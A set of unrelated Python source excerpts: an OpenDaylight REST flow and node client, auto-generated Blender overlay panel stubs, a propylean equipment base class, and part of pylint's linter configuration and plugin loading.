def prepare(self, app, path):
"""Sets up the necessary details for the REST connection by calling
prepare_url and prepare_auth.
Arguments:
'app' - which OpenDaylight northbound api component (application)
we want to talk to.
'path' - the specific rest query for the application.
"""
self.prepare_url(app, path)
self.prepare_auth()
def prepare_url(self, app, path):
"""Build the URL for this REST connection which is then stored as
OpenDaylight.url
If you use prepare(), you shouldn't need to call prepare_url()
yourself. However, if there were a URL you wanted to construct that
was so whacked out custom, then by all means build it yourself and don't
bother to call this function.
Arguments:
'app' - which OpenDaylight northbound api component (application)
we want to talk to.
'path' - the specific rest query for the application.
Note that other attributes, including 'container' are specified
in the OpenDaylight.setup dictionary.
"""
# the base url we will use for the connection
self._base_url = self.setup['http'] + self.setup['hostname'] + ':' + \
self.setup['port'] + self.setup['path']
# the specific path we are building
self.url = self._base_url + app + '/' + self.setup['container'] + path
def prepare_auth(self):
"""Set up the credentials for the REST connection by creating
an auth object for Requests and shoving it into OpenDaylight.auth
Currently, as far as I know, the OpenDaylight controller uses
http basic auth. If/when that changes this function should be
updated.
If you use prepare(), you shouldn't need to call prepare_auth()
yourself. However, if there were something you wanted to do
that was so whacked out custom, then by all means build it yourself
and don't bother to call this function.
"""
# stuff an HTTPBasicAuth object in here ready for use
self.auth = HTTPBasicAuth(self.setup['username'],
self.setup['password'])
#print("Prepare set up auth: " + self.setup['username'] + ', ' + \
# self.setup['password'])
class OpenDaylightFlow(object):
"""OpenDaylightFlow is an object that talks to the OpenDaylight
Flow Programmer application REST API
OpenDaylight.odl holds an OpenDaylight object containing details
on how to communicate with the controller.
OpenDaylightFlow.request holds a Requests object for the REST
session. Take a look at the Requests documentation for all of
the methods available, but here are a few handy examples:
OpenDaylightFlow.request.status_code - returns the http code
OpenDaylightFlow.request.text - returns the response as text
OpenDaylightFlow.flows holds a dictionary that corresponds to
the flowConfig element in the OpenDaylight REST API. Note that
we don't statically define what those fields are here in this
object. This makes this library code more flexible as flowConfig
changes over time. After all, this is REST, not RPC.
"""
def __init__(self, odl):
"""Mandatory argument:
odl - an OpenDaylight object
"""
self.odl = odl
self.__app = 'flow'
self.request = None
self.flows = None
def get(self, node_id=None, flow_name=None):
"""Get Flows specified on the Controller and stuffs the results into
the OpenDaylightFlow.flows dictionary.
Optional Arguments:
node_id - returns flows just for that switch dpid
flow_name - returns the specifically named flow on that switch
"""
# clear out any remaining crud from previous calls
if hasattr(self, 'request'):
del self.request
if hasattr(self, 'flows'):
del self.flows
if node_id is None:
self.odl.prepare(self.__app, '/')
elif flow_name is None:
self.odl.prepare(self.__app, '/' + 'OF/' + node_id + '/')
else:
self.odl.prepare(self.__app, '/' + 'OF/' + node_id + '/'
+ flow_name + '/')
self.request = requests.get(url=self.odl.url, auth=self.odl.auth)
if self.request.status_code == 200:
self.flows = self.request.json()
if 'flowConfig' in self.flows:
self.flows = self.flows.get('flowConfig')
else:
raise OpenDaylightError({'url':self.odl.url,
'http_code':self.request.status_code,
'msg':self.request.text})
def add(self, flow):
"""Given a dictionary corresponding to a flowConfig, add this flow to
the Controller. Note that the switch dpid and the flow's name is
specified in the flowConfig passed in.
"""
if hasattr(self, 'request'):
del self.request
#print(flow)
self.odl.prepare(self.__app, '/' + flow['node']['@type'] + '/' +
flow['node']['@id'] + '/' + flow['name'] + '/')
headers = {'Content-type': 'application/json'}
body = json.dumps(flow)
self.request = requests.post(url=self.odl.url, auth=self.odl.auth,
data=body, headers=headers)
if self.request.status_code != 201:
raise OpenDaylightError({'url':self.odl.url,
'http_code':self.request.status_code,
'msg':self.request.text})
#def update(self):
# """Update a flow to a Node on the Controller
# """
# raise NotImplementedError("update()")
def delete(self, node_id, flow_name):
"""Delete a flow to a Node on the Controller
Mandatory Arguments:
node_id - the switch dpid
flow_name - the specifically named flow on that switch
"""
if hasattr(self, 'request'):
del self.request
self.odl.prepare(self.__app, '/' + 'OF/' + node_id + '/' +
flow_name + '/')
self.request = requests.delete(url=self.odl.url, auth=self.odl.auth)
# note, if you wanted to pass in a flowConfig style dictionary,
# this is how you would do it. This is what I did initially, but
# it seemed clunky to pass in an entire flow.
#self.prepare(self.__app, '/' + flow['node']['@type'] + '/' +
# flow['node']['@id'] + '/' + flow['name'] + '/')
if self.request.status_code != 200:
raise OpenDaylightError({'url':self.odl.url,
'http_code':self.request.status_code,
'msg':self.request.text})
#pylint: disable=R0921
class OpenDaylightNode(object):
"""A way to talk to the OpenDaylight Switch Manager REST API
OpenDaylight.odl holds an OpenDaylight object containing details
on how to communicate with the controller.
OpenDaylightNode.request holds a Requests object for the REST
session. Take a look at the Requests documentation for all of
the methods available, but here are a few handy examples:
OpenDaylightNode.request.status_code - returns the http code
OpenDaylightNode.request.text - returns the response as text
OpenDaylightNode.nodes holds a dictionary that corresponds to
the 'nodes' element in the OpenDaylight REST API.
OpenDaylightNode.node_connectors holds a dictionary that corresponds to
the 'nodeConnectors' element in the OpenDaylight REST API.
Note that we don't statically define what those fields are contained
in the 'nodes' or 'nodeConnectors' elements here in this object.
"""
# Just a note that there are more functions available on
# the controller that could be implemented, but it is not
# clear at this time if that is useful
def __init__(self, odl):
"""Mandatory argument:
odl - an OpenDaylight object
"""
self.odl = odl
self.__app = 'switch'
self.nodes = None
self.node_connectors = None
self.request = None
def get_nodes(self):
"""Get information about Nodes on the Controller and stuffs the
result into the OpenDaylightNode.notes dictionary.
"""
if hasattr(self, 'request'):
del self.request
if hasattr(self, 'nodes'):
del self.nodes
self.odl.prepare(self.__app, '/nodes/')
self.request = requests.get(url=self.odl.url, auth=self.odl.auth)
if self.request.status_code == 200:
self.nodes = self.request.json()
if 'nodeProperties' in self.nodes:
self.nodes = self.nodes.get('nodeProperties')
else:
raise OpenDaylightError({'url':self.odl.url,
'http_code':self.request.status_code,
'msg':self.request.text})
def get_node_connectors(self, node_id):
"""Get information about NodeConnectors on the Controller and stuffs the
result into the OpenDaylightNode.node_connectors dictionary.
Mandatory Arguments:
node_id - returns flows just for that switch dpid
"""
| |
draw(self, context):
'''
'''
pass
def draw_header(self, context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class VIEW3D_PT_overlay_object(bpy_types.Panel, bpy_types._GenericUI):
bl_label = None
''' '''
bl_parent_id = None
''' '''
bl_region_type = None
''' '''
bl_rna = None
''' '''
bl_space_type = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class VIEW3D_PT_overlay_pose(bpy_types.Panel, bpy_types._GenericUI):
bl_label = None
''' '''
bl_parent_id = None
''' '''
bl_region_type = None
''' '''
bl_rna = None
''' '''
bl_space_type = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class VIEW3D_PT_overlay_sculpt(bpy_types.Panel, bpy_types._GenericUI):
bl_context = None
''' '''
bl_label = None
''' '''
bl_parent_id = None
''' '''
bl_region_type = None
''' '''
bl_rna = None
''' '''
bl_space_type = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class VIEW3D_PT_overlay_texture_paint(bpy_types.Panel, bpy_types._GenericUI):
bl_label = None
''' '''
bl_parent_id = None
''' '''
bl_region_type = None
''' '''
bl_rna = None
''' '''
bl_space_type = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class VIEW3D_PT_overlay_vertex_paint(bpy_types.Panel, bpy_types._GenericUI):
bl_label = None
''' '''
bl_parent_id = None
''' '''
bl_region_type = None
''' '''
bl_rna = None
''' '''
bl_space_type = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class VIEW3D_PT_overlay_weight_paint(bpy_types.Panel, bpy_types._GenericUI):
bl_label = None
''' '''
bl_parent_id = None
''' '''
bl_region_type = None
''' '''
bl_rna = None
''' '''
bl_space_type = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
| |
import pandas as pd
import propylean.properties as prop
from propylean import streams
# _material_stream_equipment_map and __energy_stream_equipment_map are dictionary of list
# which store index of coming from and going to equipment and type of equipment.
# Structured like {12: [10, CentrifugalPump, 21, PipeSegment],
# 23: [21, PipeSegment, 36, FlowMeter]]}
# were 12th index stream will have data in key no. 12
# stream is coming from equipment index is 10 of type CentrifugalPump and
# going into equipment index is 21 of type PipeSegment.
_material_stream_equipment_map = dict()
_energy_stream_equipment_map = dict()
#Defining generic base class for all equipments with one inlet and outlet
class _EquipmentOneInletOutlet:
items = []
def __init__(self, **inputs) -> None:
"""
DESCRIPTION:
Internal base class to define an equipment with one inlet and outlet.
All final classes inherits from this base class.
Read individual final classed for further description.
PARAMETERS:
tag:
Required: No TODO: Make tag as required or randomly generate a tag.
Type: str
Acceptable values: Any string type
Default value: None
Description: Equipment tag the user wants to provide
dynamic_state:
Required: No
Type: bool
Acceptable values: True or False
Default value: False
Description: If equipment is in dynamic state and inventory is changing.
TODO: Provide dynamic simulation capabilities.
inlet_mass_flowrate:
Required: No
Type: int or float (recommended)
Acceptable values: Any
Default value: None
Description: Represents material inlet flowrate to the equipment.
outlet_mass_flowrate:
Required: No
Type: int or float (recommended)
Acceptable values: Any
Default value: None
Description: Represents material outlet flowrate to the equipment.
design_flowrate:
Required: No
Type: int or float (recommended)
Acceptable values: Any
Default value: None
Description: Represents material design flowrate of the equipment.
inlet_pressure:
Required: No
Type: int or float (recommended)
Acceptable values: Any
Default value: None
Description: Represents material inlet pressure to the equipment.
outlet_pressure:
Required: No
Type: int or float (recommended)
Acceptable values: Any
Default value: None
Description: Represents material outlet pressure to the equipment.
design_pressure:
Required: No
Type: int or float (recommended)
Acceptable values: Any
Default value: None
Description: Represents material design pressure of the equipment.
inlet_temperature:
Required: No
Type: int or float (recommended)
Acceptable values: Any
Default value: None
Description: Represents material inlet temperature to the equipment.
outlet_temperature:
Required: No
Type: int or float (recommended)
Acceptable values: Any
Default value: None
Description: Represents material outlet temperature to the equipment.
design_temperature:
Required: No
Type: int or float (recommended)
Acceptable values: Any
Default value: None
Description: Represents material design temperature of the equipment.
RETURN VALUE:
Type: _EquipmentOneInletOutlet
Description: Object of type _EquipmentOneInletOutlet
ERROR RAISED:
Type: Various
Description:
SAMPLE USE CASES:
>>> class NewEquipment(_EquipmentOneInletOutlet):
......
"""
self.tag = None if 'tag' not in inputs else inputs['tag']
self.dynamic_state = False if 'dynamic_state' not in inputs else inputs['dynamic_state']
#Flow properties
self._inlet_mass_flowrate = prop.MassFlowRate() if 'inlet_mass_flowrate' not in inputs else prop.MassFlowRate(inputs['inlet_mass_flowrate'])
self._outlet_mass_flowrate = prop.MassFlowRate() if 'outlet_mass_flowrate' not in inputs else prop.MassFlowRate(inputs['outlet_mass_flowrate'])
# TODO: Design pressure calcs
self.design_flowrate = prop.MassFlowRate() if 'design_flowrate' not in inputs else prop.MassFlowRate(inputs['design_flowrate'])
#Pressure properties
self._inlet_pressure = prop.Pressure() if 'inlet_pressure' not in inputs else prop.Pressure(inputs['inlet_pressure'])
self._outlet_pressure = prop.Pressure() if 'outlet_pressure' not in inputs else prop.Pressure(inputs['outlet_pressure'])
if 'pressure_drop' in inputs:
self.pressure_drop = prop.Pressure(inputs['pressure_drop'])
self.design_pressure = prop.Pressure() if 'design_pressure' not in inputs else prop.Pressure(inputs['design_pressure'])
#Temperature properties
self._inlet_temperature = prop.Temperature() if 'inlet_temperature' not in inputs else prop.Temperature(inputs['inlet_temperature'])
self._outlet_temperature = prop.Temperature() if 'outlet_temperature' not in inputs else prop.Temperature(inputs['outlet_temperature'])
self.design_temperature = prop.Temperature() if 'design_temperature' not in inputs else prop.Temperature(inputs['design_temperature'])
#Inlet and outlet material and energy streams
self._inlet_material_stream_tag = None
self._outlet_material_stream_tag = None
self._inlet_energy_stream_tag = None
self._outlet_energy_stream_tag = None
#Other Porperties
self._is_disconnection = False
@property
def inlet_pressure(self):
return self._inlet_pressure
@inlet_pressure.setter
def inlet_pressure(self, value):
if isinstance(value, tuple):
self._inlet_pressure.unit = value[1]
value = value[0]
self._inlet_pressure.value = value
self._outlet_pressure.value = self._inlet_pressure.value - self.pressure_drop
@property
def outlet_pressure(self):
return self._outlet_pressure
@outlet_pressure.setter
def outlet_pressure(self,value):
if isinstance(value, tuple):
self._outlet_pressure.unit = value[1]
value = value[0]
self._outlet_pressure.value = value
self._inlet_pressure.value = self._outlet_pressure.value + self.pressure_drop
@property
def pressure_drop(self):
if (self._inlet_pressure.value == None or
self._outlet_pressure.value == None or
self._inlet_mass_flowrate.value == 0):
value = 0
else:
value = self._inlet_pressure.value - self._outlet_pressure.value
return prop.Pressure(value=value, unit=self._inlet_pressure.unit)
@pressure_drop.setter
def pressure_drop(self, value):
if isinstance(value, tuple):
self._outlet_pressure.unit = value[1]
value = value[0]
if self._inlet_pressure.value != None:
self._outlet_pressure.value = self._inlet_pressure.value - value
elif self._outlet_pressure.value != None:
self._inlet_pressure.value = self._outlet_pressure.value + value
else:
raise Exception("Error! Assign inlet value or outlet outlet before assigning differential")
@property
def inlet_temperature(self):
return self._inlet_temperature
@inlet_temperature.setter
def inlet_temperature(self, value):
if isinstance(value, tuple):
self._inlet_temperature.unit = value[1]
value = value[0]
self._inlet_temperature.value = value
@property
def outlet_temperature(self):
return self._outlet_temperature
@outlet_temperature.setter
def outlet_temperature(self,value):
if isinstance(value, tuple):
self._outlet_temperature.unit = value[1]
value = value[0]
self._outlet_temperature.value = value
@property
def inlet_mass_flowrate(self):
return self._inlet_mass_flowrate.value
@inlet_mass_flowrate.setter
def inlet_mass_flowrate(self, value):
self._inlet_mass_flowrate.value = value
self._outlet_mass_flowrate = self._inlet_mass_flowrate.value + self.inventory_change_rate
@property
def outlet_mass_flowrate(self):
return self._outlet_mass_flowrate
@outlet_mass_flowrate.setter
def outlet_mass_flowrate(self, value):
self._outlet_mass_flowrate = value
self._inlet_mass_flowrate.value = self._outlet_mass_flowrate - self.inventory_change_rate
@property
def inventory_change_rate(self):
if not self.dynamic_state:
return 0
if (self._inlet_mass_flowrate.value == None or
self._outlet_mass_flowrate == None):
return None
return self._inlet_mass_flowrate.value - self._outlet_mass_flowrate
@inventory_change_rate.setter
def inventory_change_rate(self, value):
if self._inlet_mass_flowrate.value != None:
self._outlet_mass_flowrate = self._inlet_mass_flowrate.value - value
elif self._outlet_mass_flowrate != None:
self._inlet_mass_flowrate.value = self._outlet_mass_flowrate + value
else:
raise Exception("Error! Assign inlet value or outlet outlet before assigning differential")
@classmethod
def get_equipment_index(cls, tag):
for index, equipment in enumerate(cls.items):
if equipment.tag == tag:
return index
return None
def get_stream_tag(self, stream_type, direction):
"""
DESCRIPTION:
Class method to get stream tag using steam type and the direction.
PARAMETERS:
stream_type:
Required: Yes
Type: str
Acceptable values: 'm', 'mass', 'e', 'energy'
Description: Type of stream user wants to get tag of.
direction:
Required: Yes
Type: str
Acceptable values: 'in', 'out', 'inlet' or 'outlet'
Description: Direction of stream with respect to equipment user wants to get tag of.
RETURN VALUE:
Type: str
Description: Tag value of stream user has assigned to the stream
ERROR RAISED:
Type: General TODO
Description: Raises error if arguments are incorrect
SAMPLE USE CASES:
>>> eq1.get_stream_tag('m', 'out')
>>> eq1.get_stream_tag('energy', 'in')
"""
if stream_type.lower() in ['material', 'mass', 'm']:
stream_tag = [self._inlet_material_stream_tag, self._outlet_material_stream_tag]
elif stream_type.lower() in ['energy', 'power', 'e', 'p']:
stream_tag = [self._inlet_energy_stream_tag, self._outlet_energy_stream_tag]
else:
raise Exception('Incorrect stream_type specified! Provided \"'+stream_type+'\". Can only be "material/mass/m" or "energy/e/power/p"]')
if direction.lower() in ['in', 'inlet']:
return stream_tag[0]
elif direction.lower() in ['out', 'outlet']:
return stream_tag[1]
else:
raise Exception('Incorrect direction specified! Provided \"'+direction+'\". Can only be ["in", "out", "inlet", "outlet"]')
def connect_stream(self,
stream_object=None,
direction=None,
stream_tag=None,
stream_type=None):
"""
DESCRIPTION:
Class method to connect a stream object with equiment.
PARAMETERS:
stream_object:
Required: No if stream_tag is provided else Yes
Type: EnergyStream or MaterialStream
Acceptable values: object of specified stream types
Default value: None
Description: Stream object user wants to connect the equipment with.
direction:
Required: Yes for material stream. For energy stream not needed
Type: str
Acceptable values: 'in', 'out', 'inlet' or 'outlet'
Default value: None
Description: Direction in which stream should be with respect to equipment.
stream_tag:
Required: No if stream_object is provided else Yes
Type: str
Acceptable values: stream tag provided by user
Default value: None
Description: Stream object with known stream_tag user wants to connect the equipment with.
stream_type:
Required: No if stream_object provided
Type: str
Acceptable values: 'm', 'mass', 'e', 'energy'
Description: Type of stream user wants to connect.
RETURN VALUE:
Type: bool
Description: True is returned if connection is successful else False
ERROR RAISED:
Type: General
Description: Error raised if arguments are wrong
SAMPLE USE CASES:
>>> eq1.connect_stream(en1)
>>> eq1.connect_stream(direction='out', stream_tag='Pump-outlet', stream_type='m')
"""
if stream_object is not None:
if not (isinstance(stream_object, streams.EnergyStream) or
isinstance(stream_object, streams.MaterialStream)):
raise Exception("Stream object should be of type EnergyStream or Material Stream not "+
+type(stream_object))
stream_tag = stream_object.tag
if isinstance(stream_object, streams.MaterialStream):
stream_type = 'material'
elif isinstance(stream_object, streams.EnergyStream):
stream_type = 'energy'
elif not self._is_disconnection and stream_tag is None:
raise Exception("Either of Stream Object or Stream Tag is required for connection!")
if stream_type.lower() not in ['material', 'mass', 'm', 'energy', 'power', | |
Pylint. Specifying 0 will "
"auto-detect the number of processors available to use.",
},
),
(
"unsafe-load-any-extension",
{
"type": "yn",
"metavar": "<yn>",
"default": False,
"hide": True,
"help": (
"Allow loading of arbitrary C extensions. Extensions"
" are imported into the active Python interpreter and"
" may run arbitrary code."
),
},
),
(
"limit-inference-results",
{
"type": "int",
"metavar": "<number-of-results>",
"default": 100,
"help": (
"Control the amount of potential inferred values when inferring "
"a single object. This can help the performance when dealing with "
"large functions or complex, nested conditions. "
),
},
),
(
"extension-pkg-allow-list",
{
"type": "csv",
"metavar": "<pkg[,pkg]>",
"default": [],
"help": (
"A comma-separated list of package or module names"
" from where C extensions may be loaded. Extensions are"
" loading into the active Python interpreter and may run"
" arbitrary code."
),
},
),
(
"extension-pkg-whitelist",
{
"type": "csv",
"metavar": "<pkg[,pkg]>",
"default": [],
"help": (
"A comma-separated list of package or module names"
" from where C extensions may be loaded. Extensions are"
" loading into the active Python interpreter and may run"
" arbitrary code. (This is an alternative name to"
" extension-pkg-allow-list for backward compatibility.)"
),
},
),
(
"suggestion-mode",
{
"type": "yn",
"metavar": "<yn>",
"default": True,
"help": (
"When enabled, pylint would attempt to guess common "
"misconfiguration and emit user-friendly hints instead "
"of false-positive error messages."
),
},
),
(
"exit-zero",
{
"action": "store_true",
"help": (
"Always return a 0 (non-error) status code, even if "
"lint errors are found. This is primarily useful in "
"continuous integration scripts."
),
},
),
(
"from-stdin",
{
"action": "store_true",
"help": (
"Interpret the stdin as a python script, whose filename "
"needs to be passed as the module_or_package argument."
),
},
),
)
option_groups = (
("Messages control", "Options controlling analysis messages"),
("Reports", "Options related to output formatting and reporting"),
)
def __init__(self, options=(), reporter=None, option_groups=(), pylintrc=None):
"""Some stuff has to be done before ancestors initialization...
messages store / checkers / reporter / astroid manager"""
self.msgs_store = MessageDefinitionStore()
self.reporter = None
self._reporter_names = None
self._reporters = {}
self._checkers = collections.defaultdict(list)
self._pragma_lineno = {}
self._ignore_file = False
# visit variables
self.file_state = FileState()
self.current_name = None
self.current_file = None
self.stats = None
self.fail_on_symbols = []
# init options
self._external_opts = options
self.options = options + PyLinter.make_options()
self.option_groups = option_groups + PyLinter.option_groups
self._options_methods = {"enable": self.enable, "disable": self.disable}
self._bw_options_methods = {
"disable-msg": self._options_methods["disable"],
"enable-msg": self._options_methods["enable"],
}
MessagesHandlerMixIn.__init__(self)
reporters.ReportsHandlerMixIn.__init__(self)
super().__init__(
usage=__doc__,
config_file=pylintrc or next(config.find_default_config_files(), None),
)
checkers.BaseTokenChecker.__init__(self)
# provided reports
self.reports = (
("RP0001", "Messages by category", report_total_messages_stats),
(
"RP0002",
"% errors / warnings by module",
report_messages_by_module_stats,
),
("RP0003", "Messages", report_messages_stats),
)
self.register_checker(self)
self._dynamic_plugins = set()
self._python3_porting_mode = False
self._error_mode = False
self.load_provider_defaults()
if reporter:
self.set_reporter(reporter)
def load_default_plugins(self):
checkers.initialize(self)
reporters.initialize(self)
# Make sure to load the default reporter, because
# the option has been set before the plugins had been loaded.
if not self.reporter:
self._load_reporters()
def load_plugin_modules(self, modnames):
"""take a list of module names which are pylint plugins and load
and register them
"""
for modname in modnames:
if modname in self._dynamic_plugins:
continue
self._dynamic_plugins.add(modname)
try:
module = astroid.modutils.load_module_from_name(modname)
module.register(self)
except ModuleNotFoundError:
pass
def load_plugin_configuration(self):
"""Call the configuration hook for plugins
This walks through the list of plugins, grabs the "load_configuration"
hook, if exposed, and calls it to allow plugins to configure specific
settings.
"""
for modname in self._dynamic_plugins:
try:
module = astroid.modutils.load_module_from_name(modname)
if hasattr(module, "load_configuration"):
module.load_configuration(self)
except ModuleNotFoundError as e:
self.add_message("bad-plugin-value", args=(modname, e), line=0)
def _load_reporters(self) -> None:
sub_reporters = []
output_files = []
with contextlib.ExitStack() as stack:
for reporter_name in self._reporter_names.split(","):
reporter_name, *reporter_output = reporter_name.split(":", 1)
reporter = self._load_reporter_by_name(reporter_name)
sub_reporters.append(reporter)
if reporter_output:
(reporter_output,) = reporter_output
# pylint: disable=consider-using-with
output_file = stack.enter_context(open(reporter_output, "w"))
reporter.set_output(output_file)
output_files.append(output_file)
# Extend the lifetime of all opened output files
close_output_files = stack.pop_all().close
if len(sub_reporters) > 1 or output_files:
self.set_reporter(
reporters.MultiReporter(
sub_reporters,
close_output_files,
)
)
else:
self.set_reporter(sub_reporters[0])
def _load_reporter_by_name(self, reporter_name: str) -> reporters.BaseReporter:
name = reporter_name.lower()
if name in self._reporters:
return self._reporters[name]()
try:
reporter_class = _load_reporter_by_class(reporter_name)
except (ImportError, AttributeError) as e:
raise exceptions.InvalidReporterError(name) from e
else:
return reporter_class()
def set_reporter(self, reporter):
"""set the reporter used to display messages and reports"""
self.reporter = reporter
reporter.linter = self
def set_option(self, optname, value, action=None, optdict=None):
"""overridden from config.OptionsProviderMixin to handle some
special options
"""
if optname in self._options_methods or optname in self._bw_options_methods:
if value:
try:
meth = self._options_methods[optname]
except KeyError:
meth = self._bw_options_methods[optname]
warnings.warn(
"%s is deprecated, replace it by %s"
% (optname, optname.split("-")[0]),
DeprecationWarning,
)
value = utils._check_csv(value)
if isinstance(value, (list, tuple)):
for _id in value:
meth(_id, ignore_unknown=True)
else:
meth(value)
return # no need to call set_option, disable/enable methods do it
elif optname == "output-format":
self._reporter_names = value
# If the reporters are already available, load
# the reporter class.
if self._reporters:
self._load_reporters()
try:
checkers.BaseTokenChecker.set_option(self, optname, value, action, optdict)
except config.UnsupportedAction:
print("option %s can't be read from config file" % optname, file=sys.stderr)
def register_reporter(self, reporter_class):
self._reporters[reporter_class.name] = reporter_class
def report_order(self):
reports = sorted(self._reports, key=lambda x: getattr(x, "name", ""))
try:
# Remove the current reporter and add it
# at the end of the list.
reports.pop(reports.index(self))
except ValueError:
pass
else:
reports.append(self)
return reports
# checkers manipulation methods ############################################
def register_checker(self, checker):
"""register a new checker
checker is an object implementing IRawChecker or / and IAstroidChecker
"""
assert checker.priority <= 0, "checker priority can't be >= 0"
self._checkers[checker.name].append(checker)
